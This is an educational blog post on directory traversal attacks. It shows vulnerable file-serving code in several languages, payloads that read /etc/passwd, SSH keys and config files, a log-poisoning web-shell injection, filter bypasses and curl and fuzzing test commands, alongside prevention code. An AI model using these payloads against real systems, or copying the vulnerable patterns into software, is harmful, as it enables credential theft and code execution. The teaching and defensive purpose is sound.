Directory Traversal Attacks
Directory traversal is one of those vulnerabilities that makes you wonder how it still exists. The concept is dead simple — you manipulate a file path to escape the intended directory and read (or write) files elsewhere on the filesystem. A few ../ sequences, and you’re reading /etc/passwd, application config files, or source code containing database credentials.
It falls under “Broken Access Control” in the OWASP Top 10, it’s trivially easy to test for, and yet it keeps showing up because developers keep building file paths from user input without validation.
How Directory Traversal Works
Filesystems are hierarchical. Every file has a path relative to the root:
/
├── etc/
│   ├── passwd
│   ├── shadow
│   └── hosts
├── var/
│   └── www/
│       └── html/
│           ├── index.php
│           ├── images/
│           │   ├── logo.png
│           │   └── banner.jpg
│           └── uploads/
└── home/
    └── thilan/
The .. notation means “go up one directory.” So if you’re in /var/www/html/images/ and you reference ../../, you end up at /var/www/. Chain enough ../ sequences and you reach the root — from there you can access anything the web server process has permission to read.
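To make the resolution rule concrete, here is a minimal sketch using Python's posixpath module, which collapses .. segments purely as strings without touching the filesystem. The helper name resolve is hypothetical, and a real filesystem would additionally follow symlinks, which this sketch ignores.

```python
import posixpath


def resolve(base: str, user_input: str) -> str:
    """Join two path fragments and collapse '.' and '..' segments lexically."""
    return posixpath.normpath(posixpath.join(base, user_input))


IMAGES = "/var/www/html/images/"

# Two levels up from the images directory.
print(resolve(IMAGES, "../../"))

# Four levels up reaches the root, then descends into etc/.
print(resolve(IMAGES, "../../../../etc/passwd"))

# Surplus ../ segments are absorbed at the root, so overshooting is harmless
# for the attacker.
print(resolve(IMAGES, "../" * 10 + "etc/passwd"))
```

The last call is why real payloads often carry more ../ segments than strictly needed: the attacker does not have to know how deep the application directory is.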
The attack targets any feature where user input is used to construct a file path:
- Image/file viewers (?file=report.pdf)
- File download endpoints (?download=document.docx)
- Template/page includes (?page=about)
- Language file loaders (?lang=en)
The Classic Example
A web application serves images through a PHP script:
<?php
$image = $_GET['image'];
$path = '/var/www/html/images/' . $image;
header('Content-Type: image/jpeg');
readfile($path);
?>
Normal use:
GET /view.php?image=logo.png
→ Reads: /var/www/html/images/logo.png ✓
Attack:
GET /view.php?image=../../../../etc/passwd
→ Reads: /var/www/html/images/../../../../etc/passwd
→ Resolves to: /etc/passwd ← Game over
The ../../../../ walks up four directories from /var/www/html/images/ to /, then descends into etc/passwd. The server happily reads the file and sends it back.
/var/www/html/images/ ← starting here
../ → /var/www/html/
../ → /var/www/
../ → /var/
../ → /
etc/passwd → /etc/passwd
What Attackers Target
Once you can read arbitrary files, here’s what’s valuable:
Linux Systems
# System files
../../../../etc/passwd # User accounts (always readable)
../../../../etc/shadow # Password hashes (usually needs root)
../../../../etc/hosts # Network configuration
../../../../proc/self/environ # Environment variables (may contain secrets)
../../../../proc/self/cmdline # How the process was started
# Application files
../../../../var/www/html/config.php # Database credentials
../../../../var/www/html/.env # Environment configuration
../../../../var/log/apache2/access.log # Web server logs
# SSH keys
../../../../home/thilan/.ssh/id_rsa # Private SSH key
../../../../root/.ssh/id_rsa # Root's private SSH key
Windows Systems
..\..\..\..\windows\system32\drivers\etc\hosts
..\..\..\..\windows\win.ini
..\..\..\..\inetpub\wwwroot\web.config # IIS config with connection strings
..\..\..\..\users\administrator\.ssh\id_rsa
Note: Windows accepts both / and \ as path separators, which is important for bypass techniques.
Application Source Code
This is often more valuable than system files. Reading the application’s source code reveals:
- Database credentials in config files
- API keys and secrets
- Business logic vulnerabilities
- Other file paths to target
- Internal API endpoints
Vulnerable Patterns Across Languages
PHP — File Inclusion
PHP’s include() and require() are especially dangerous because they don’t just read the file: they execute it as PHP code. This can turn directory traversal into Remote Code Execution.
<?php
// VULNERABLE: Local File Inclusion (LFI)
$page = $_GET['page'];
include($page);
?>
GET /index.php?page=../../../../var/log/apache2/access.log
If the attacker can inject PHP code into the access log (via a crafted User-Agent header) and the web server user is allowed to read that log, the include() will execute it. This is the classic log poisoning technique. If the code appended a fixed suffix, as in include($page . '.php'), the attacker would first have to get rid of that suffix (see the null byte and path truncation bypasses below).
# Step 1: Inject PHP into the access log via User-Agent
$ curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# Step 2: Include the poisoned log file and pass a command to run
GET /index.php?page=../../../../var/log/apache2/access.log&cmd=id
Python — Flask/Django
from flask import Flask, request, send_file

app = Flask(__name__)

@app.route('/download')
def download():
    filename = request.args.get('file')
    # VULNERABLE: User input directly in file path
    return send_file(f'/var/www/uploads/{filename}')
GET /download?file=../../../../etc/passwd
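Swapping the f-string for os.path.join does not help on its own, and it adds a second way in: when a later argument is an absolute path, everything before it is discarded. The sketch below uses posixpath (what os.path is on Linux) so it behaves the same on any platform; UPLOAD_DIR is the directory from the example above.

```python
import posixpath

UPLOAD_DIR = "/var/www/uploads"

# A relative traversal payload is simply appended, exactly like the f-string.
relative = posixpath.join(UPLOAD_DIR, "../../../../etc/passwd")
print(relative)

# An absolute payload replaces the base directory entirely; no ../ is needed.
absolute = posixpath.join(UPLOAD_DIR, "/etc/passwd")
print(absolute)
```

So a request like ?file=/etc/passwd can succeed against join-based code even if ../ sequences are filtered out.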
Node.js — Express
const express = require('express');
const path = require('path');

const app = express();

app.get('/files', (req, res) => {
  const filename = req.query.name;
  // VULNERABLE: Path concatenation with user input
  const filepath = path.join(__dirname, 'public', filename);
  res.sendFile(filepath);
});
GET /files?name=../../../../etc/passwd
Note: path.join() resolves .. sequences, so path.join('/app/public', '../../../../etc/passwd') returns /etc/passwd. It does NOT prevent traversal — it just normalizes the path.
Java — Servlet
@WebServlet("/download")
public class DownloadServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String filename = request.getParameter("file");
        // VULNERABLE: Direct path concatenation
        File file = new File("/var/www/uploads/" + filename);
        // try-with-resources closes the stream even if streaming fails
        try (FileInputStream fis = new FileInputStream(file)) {
            // ... stream file to response
        }
    }
}
Bypass Techniques
Developers often implement naive filters that attackers can bypass:
Bypass 1: URL Encoding
If the application filters for a literal ../ but runs that check before the value has been URL-decoded:
%2e%2e%2f → ../
%2e%2e/ → ../
..%2f → ../
%2e%2e%5c → ..\ (Windows)
Double encoding (if the server decodes twice):
%252e%252e%252f → %2e%2e%2f → ../
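The ordering problem can be sketched in a few lines of Python. Both naive_filter and handle are hypothetical stand-ins for an application that inspects the raw parameter and decodes it afterwards; urllib.parse.unquote performs one round of URL decoding.

```python
from urllib.parse import unquote


def naive_filter(raw: str) -> bool:
    """Hypothetical filter: accept input only if it has no literal '../'."""
    return "../" not in raw


def handle(raw: str) -> str:
    """Hypothetical handler: check the raw value first, decode afterwards."""
    if not naive_filter(raw):
        return "blocked"
    return unquote(raw)


# The plain payload is caught.
print(handle("../../etc/passwd"))

# The encoded payload passes the check, then decodes into a traversal.
print(handle("%2e%2e%2f%2e%2e%2fetc/passwd"))

# Double encoding: one decode still looks harmless, a second one does not.
once = unquote("%252e%252e%252fetc/passwd")
twice = unquote(once)
print(once, "->", twice)
```

The fix is not a smarter filter but a different order: decode fully, resolve the path, and only then check where it points.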
Bypass 2: Null Byte (PHP < 5.3.4)
If the application appends an extension:
include($_GET['page'] . '.php');
The attacker uses a null byte to truncate the extension:
GET /index.php?page=../../../../etc/passwd%00
→ include('../../../../etc/passwd\0.php')
→ C function stops at \0 → reads /etc/passwd
This was fixed in PHP 5.3.4 but is still relevant for legacy applications.
Bypass 3: Path Truncation
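In old PHP versions (generally cited as those before 5.3), a path longer than the platform’s limit was silently truncated. Padding the payload until the appended extension falls past that limit removes it:
../../../../etc/passwd/./././././././././././././. (repeat until path limit)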
Bypass 4: Alternative Separators
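Windows accepts both \ and / as separators, so a filter that only looks for ../ misses the backslash forms. Filters that strip ../ in a single pass can also be fed nested sequences:
..\..\..\..\windows\win.ini # Backslashes (Windows targets)
....//....//....//etc/passwd # Becomes ../../../etc/passwd after one pass of stripping ../
..\/..\/..\/etc/passwd # Mixed separators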
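The nested ....// payload works against sanitizers that remove ../ once and never re-check the result. A minimal sketch, with strip_once as a hypothetical sanitizer of that kind:

```python
def strip_once(value: str) -> str:
    """Hypothetical sanitizer: delete every '../' found in a single pass."""
    return value.replace("../", "")


payload = "....//....//....//etc/passwd"
cleaned = strip_once(payload)

# Removing the inner '../' from each '....//' leaves a fresh '../' behind.
print(cleaned)
```

Each ....// contains one ../ in the middle; deleting it joins the leftover .. and / into a new ../ that the sanitizer has already moved past.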
Bypass 5: Bypassing Prefix Checks
If the application checks that the path starts with the expected directory:
$path = '/var/www/uploads/' . $_GET['file'];
if (strpos($path, '/var/www/uploads/') === 0) {
readfile($path); // Still vulnerable!
}
The check passes because the path starts with /var/www/uploads/ — but after ../ resolution, it escapes:
/var/www/uploads/../../../../etc/passwd
→ starts with /var/www/uploads/ ✓ (check passes)
→ resolves to /etc/passwd (traversal succeeds)
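The same flaw, sketched in Python: because the code itself prepends the base directory, a prefix test on the unresolved string can never fail. The function name prefix_check_only is hypothetical, and posixpath.normpath stands in for the resolution the filesystem performs later.

```python
import posixpath

BASE = "/var/www/uploads/"


def prefix_check_only(user_input: str) -> bool:
    """Hypothetical check: test the prefix of the unresolved, concatenated path."""
    path = BASE + user_input
    return path.startswith(BASE)  # always True: BASE was just prepended


payload = "../../../../etc/passwd"
passes = prefix_check_only(payload)
resolved = posixpath.normpath(BASE + payload)

print(passes)    # the check accepts the payload
print(resolved)  # where the path actually points after resolution
```

The check only becomes meaningful once it is applied to the resolved path rather than the concatenated string.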
Prevention
1. Use basename() — Strip the Path Entirely
The simplest fix when users only ever need to name a file inside a single directory: use basename() to extract just the filename, discarding any directory components.
<?php
$filename = basename($_GET['file']); // "../../../../etc/passwd" → "passwd"
$path = '/var/www/uploads/' . $filename;
// is_file() rejects directories, so an input of ".." cannot slip through
if (is_file($path)) {
    readfile($path);
} else {
    http_response_code(404);
    echo "File not found";
}
?>
This is the nuclear option — it completely removes any directory traversal. Use it when the user should only specify a filename, never a path.
2. Validate with realpath() — Verify After Resolution
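Resolve the full path and verify it’s within the expected directory:
<?php
$baseDir = '/var/www/uploads/';
$filename = $_GET['file'];
$fullPath = realpath($baseDir . $filename);
$realBase = realpath($baseDir);
// Check that:
// 1. realpath() succeeded (the file and the base directory exist)
// 2. The resolved path lies inside the base directory. The trailing
//    separator matters: without it, /var/www/uploads_private would match too.
if ($fullPath !== false && $realBase !== false
    && strpos($fullPath, $realBase . DIRECTORY_SEPARATOR) === 0) {
    readfile($fullPath);
} else {
    http_response_code(403);
    echo "Access denied";
}
?>
This defeats the bypass techniques above because the check runs on the final filesystem path: realpath() resolves ../ sequences, redundant separators, and symlinks. It does not URL-decode anything. PHP has already decoded $_GET once, and a payload that is still encoded at this point is treated as a literal filename, which will not exist. Then we verify the result is within our allowed directory.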
3. Whitelist / ID Mapping — Don’t Use Filenames at All
The most secure approach: never let users specify filenames. Use an ID that maps to a predefined file:
<?php
$fileMap = [
'1' => '/var/www/uploads/report-q1.pdf',
'2' => '/var/www/uploads/report-q2.pdf',
'3' => '/var/www/uploads/brochure.pdf',
];
$id = $_GET['id'];
if (isset($fileMap[$id])) {
readfile($fileMap[$id]);
} else {
http_response_code(404);
echo "File not found";
}
?>
No user-controlled path. No traversal possible. The attacker can only access files you explicitly listed.
4. Python — Secure Path Handling
import os
from flask import Flask, request, send_file, abort

app = Flask(__name__)
UPLOAD_DIR = os.path.realpath('/var/www/uploads')

@app.route('/download')
def download():
    filename = request.args.get('file', '')
    # Resolve the full path (collapses ../ and follows symlinks)
    full_path = os.path.realpath(os.path.join(UPLOAD_DIR, filename))
    # Verify it's within the upload directory; comparing against UPLOAD_DIR
    # plus a separator keeps /var/www/uploads_private from matching
    if not full_path.startswith(UPLOAD_DIR + os.sep):
        abort(403)
    if not os.path.isfile(full_path):
        abort(404)
    return send_file(full_path)
5. Node.js — Secure Path Handling
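const express = require('express');
const path = require('path');
const fs = require('fs');

const app = express();
const UPLOAD_DIR = path.resolve(__dirname, 'uploads');

app.get('/files', (req, res) => {
  const filename = req.query.name;
  // Reject missing or non-string values (query values can be arrays)
  if (typeof filename !== 'string') {
    return res.status(400).send('Bad request');
  }
  const fullPath = path.resolve(UPLOAD_DIR, filename);
  // Verify the resolved path is within our directory; the trailing
  // separator keeps a sibling such as uploads_private from matching
  if (!fullPath.startsWith(UPLOAD_DIR + path.sep)) {
    return res.status(403).send('Access denied');
  }
  if (!fs.existsSync(fullPath)) {
    return res.status(404).send('Not found');
  }
  res.sendFile(fullPath);
});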
The pattern is the same in every language: resolve the full path, then verify it’s within the allowed directory.
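One detail of the "verify" step deserves care: a bare string-prefix test on the resolved path also accepts sibling directories whose names merely start with the base name. The sketch below shows a containment helper built on os.path.commonpath, which compares whole path components. The name is_within and the uploads_private directory are hypothetical.

```python
import os


def is_within(base_dir: str, candidate: str) -> bool:
    """Return True if candidate resolves to base_dir or something beneath it."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(candidate)
    try:
        # commonpath compares whole components, not raw characters.
        return os.path.commonpath([base, target]) == base
    except ValueError:
        # Raised on Windows when the two paths are on different drives.
        return False


BASE = "/var/www/uploads"
sibling = "/var/www/uploads/../uploads_private/secret.txt"

# A plain prefix test on the resolved string is fooled by the sibling name.
print(os.path.realpath(sibling).startswith(os.path.realpath(BASE)))

# The component-wise check is not.
print(is_within(BASE, sibling))
print(is_within(BASE, "/var/www/uploads/report.pdf"))
```

Appending a path separator to the base before a prefix comparison achieves the same effect; commonpath is simply harder to get subtly wrong.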
6. Web Server Configuration
As an additional layer, configure your web server to refuse direct requests for sensitive files. These rules only cover URLs the web server resolves itself; they do not stop a vulnerable script from reading the same files:
# Nginx — restrict access to sensitive files
location ~ /\. {
    deny all; # Block dotfiles (.env, .git, .htaccess)
}
location ~* \.(conf|ini|log|sh|sql)$ {
    deny all; # Block sensitive file extensions
}
# Apache — same in .htaccess
<FilesMatch "\.(conf|ini|log|sh|sql|env)$">
    Require all denied
</FilesMatch>
Testing for Directory Traversal
Manual Testing
# Basic traversal
curl "http://target.com/view?file=../../../../etc/passwd"
# URL encoded
curl "http://target.com/view?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
# Double encoded
curl "http://target.com/view?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd"
# Null byte (legacy PHP)
curl "http://target.com/view?file=../../../../etc/passwd%00"
# Windows paths
curl "http://target.com/view?file=..\..\..\..\windows\win.ini"
With Burp Suite
Intruder with a wordlist of traversal payloads is the fastest approach. The dotdotpwn wordlist covers hundreds of encoding variations.
Automated
# Using ffuf with a traversal wordlist
$ ffuf -u "http://target.com/view?file=FUZZ" -w traversal-payloads.txt -mc 200
# Using dotdotpwn
$ dotdotpwn -m http -h target.com -f /etc/passwd
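If no wordlist is at hand, a small one can be generated. The following is a rough sketch, not a replacement for a curated list: traversal_payloads is a hypothetical helper that emits plain, URL-encoded, and double-encoded variants at increasing depths.

```python
from urllib.parse import quote


def traversal_payloads(target: str, max_depth: int = 6):
    """Yield plain, URL-encoded, and double-encoded payloads for each depth."""
    for depth in range(1, max_depth + 1):
        plain = "../" * depth + target.lstrip("/")
        # quote() leaves dots alone, so encode them explicitly as %2e.
        encoded = quote(plain, safe="").replace(".", "%2e")
        # Encoding the percent signs again gives the double-encoded form.
        double = encoded.replace("%", "%25")
        yield plain
        yield encoded
        yield double


if __name__ == "__main__":
    for payload in traversal_payloads("/etc/passwd", max_depth=4):
        print(payload)
```

Redirecting the output to a file such as traversal-payloads.txt produces input for the ffuf command above.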
Final Thoughts
Directory traversal is a solved problem from a technical standpoint. The fix is well-known: resolve the path, validate it’s within the allowed directory. realpath() + prefix check, or basename(), or ID mapping — pick any of them and the vulnerability disappears.
Yet it keeps showing up in production code because developers build file paths from user input without thinking about it. Every open(), include(), readfile(), send_file(), or readFileSync() that touches user input is a potential traversal point.
The mental model is simple: never trust a user-controlled path. Validate it after resolution, not before. And when possible, don’t use paths at all — use IDs that map to files server-side.
Thanks for reading!